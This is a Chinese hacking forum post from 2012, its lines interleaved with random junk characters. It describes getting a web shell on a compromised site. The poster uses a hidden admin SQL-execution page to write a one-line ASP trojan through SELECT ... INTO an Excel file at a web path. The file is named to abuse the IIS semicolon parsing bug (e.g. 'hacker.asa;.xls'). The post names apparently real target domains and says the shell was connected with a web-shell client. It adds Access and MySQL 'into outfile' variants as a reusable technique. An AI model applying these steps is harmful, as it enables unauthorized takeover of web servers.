好不容易进了后台,发现啥上传啊。备份啊多木有。3 ~! k2 K% f8 h5 j0 V7 ]8 E7 ]* r" K, W
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的: b& |7 I9 i; x/ ~ r$ k8 S
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
6 ?$ e% B1 o8 ]$ z然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:3 E0 V/ h7 c3 b1 R$ x2 y
1.create table cmd (a varchar(50))
5 J/ [% k; S6 Z# N! m: J0 _2.insert into cmd (a) values (‘‘)
8 Y: [8 }/ t9 S8 b. m2 I- T8 k% U3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd/ V" j2 |9 k. F. g' G8 h
(把表cmd的内容导出为物理路径的一个EXCEL文件)6 B/ `8 D. A" e* h- `) L
4.drop table cmd
5 v: _, b; ?- j利用IIS的BUG成功拿到了WEBSHELL。
4 g% r4 ?/ V" |5 z4 l! r! x( R! q5 F! @! @2 t
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话! b( R' Z( @4 b$ d6 m/ v+ f
8 J9 g# K" c/ R+ e SQL语句意思解释:
! A( f1 I1 Z0 R, J9 b 第一句. K3 O r! C( W! ~6 n, J2 s* T
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50& E" P: T @: G0 f+ z, \' J- |0 T
4 e) }% n; x$ a" d, C u# x _4 S
第二句! n, n+ c* I; M' g5 v8 ]
在表cmd的a字段插入一句话木马
, B) f" c: j; u! O. \0 K 第三句* t f& t2 b, u" q2 x
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
' ^/ M, r# O' O, }, E! G v( R
; I* I8 g6 p6 Y) r) j9 V. C/ q 第四句
8 T- v4 \1 C5 H& N 删除建立的cmd表
1 V9 m* Q" }3 J9 N9 x$ f
8 D( Z( {& T+ {- e 以下内容为测试:
( j7 D. x# j+ I( h. U Access利用后台SQL执行命令功能导出WebShell:# y! Z# H, A+ p$ O! h$ I
这个更简单:
8 {6 v: q; X+ p) K$ N% W [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]. Q% e* j8 s0 @; C `' \' t
或者- w) \8 X! g7 K# C) _) x2 I
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]- ^% A% a- ?7 {6 ]* a
2 V# \ z8 l# K4 F5 Y. S: G
后台有执行SQL语句功能(vote为已知表段)# j. m, s/ N5 {2 h1 t
希望对大家有所帮助拿shell的又一个思路
3 P6 D5 @ p1 X& B! |: T |
发表于 2012-9-13 17:53:58
收藏
支持
反对